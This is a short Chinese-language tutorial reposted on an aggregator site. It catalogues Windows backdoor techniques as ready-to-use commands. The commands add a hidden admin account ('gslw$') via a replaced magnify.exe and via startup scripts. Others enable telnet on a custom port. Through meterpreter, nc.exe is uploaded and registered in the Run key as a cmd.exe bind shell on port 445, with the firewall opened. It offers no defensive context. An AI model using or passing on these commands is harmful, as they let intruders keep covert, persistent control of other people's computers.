Windows后门小计

内容导读

互联网集市收集整理的这篇技术教程文章主要介绍了Windows后门小计，小编现在分享给大家，供广大互联网技能从业者学习和参考。文章包含1741字，纯文字阅读大概需要3分钟。

内容图文

嗅探欺骗：

---

在目标机上安装嗅探工具窃取管理员的密码

放大镜替换：

---

 

构造批处理：

　　@echo off
　　net user gslw$ test168 /add
　　net localgroup administrators gslw$ /add
　　%Windir%\system32\nagnify.exe
　　exit
转换exe文件：
battoexe等工具
文件替换：
　　@echo off
　　copy %Windir%\system32\dllcache\magnify.exe nagnify.exe
　　copy %Windir%\system32\magnify.exe nagnify.exe
　　replace.exe %Windir%\magnify.exe %Windir%\system32\dllcache
　　replace.exe %Windir%\magnify.exe %Windir%\system32
　　exit
后门利用：
Win+U启动辅助工具项，打开放大镜即可

组策略欺骗：

---

在windows开关机启动脚本中做手脚：
@echo off & net user gslw$ test168 /add && netlocalgroup administrators gslw$ /add & exit

telnet利用：

---

远程改端口：“tlntadmn config \\192.168.1.9 port=800 -u gslw -p test168 ”
在目标机开启：
tlntadmn config port=2233 //修改 telnet默认端口
sc config tlntsvr start= auto //设置启动类型为自启动
net start telnet //开启telnet服务项
tlntadmn config sec =passwd //设置密码
tlntadmn config port = 800 //设置端口
远程登陆：telnet 192.168.1.9 800 //键入账号密码即可连接

msf（Netcat.exe）：

---

上传到目标系统：meterpreter > upload /usr/share/windows-binaries/nc.exe C:\\windows\\system32
查看自启：meterpreter > reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run
设置自启：meterpreter > reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v nc -d 'C:\windows\system32\nc.exe -Ldp 445 -e cmd.exe'
检查确认：meterpreter > reg queryval -k HKLM\\software\\microsoft\\windows\\currentversion\\Run -v nc
打开cmd ：meterpreter > execute -f cmd -i
开放445端口：netsh firewall add portopening TCP 445 "Service Firewall" ENABLE ALL
检查是配置：netsh firewall show portopening
后门使用：nc -v 172.16.104.128 445

内容总结

以上是互联网集市为您收集整理的Windows后门小计全部内容，希望文章能够帮你解决Windows后门小计所遇到的程序开发问题。 如果觉得互联网集市技术教程内容还不错，欢迎将互联网集市网站推荐给程序员好友。

内容备注

版权声明：本文内容由互联网用户自发贡献，该文观点与技术仅代表作者本人。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容， 请发送邮件至 gblab@vip.qq.com 举报，一经查实，本站将立刻删除。

内容手机端

---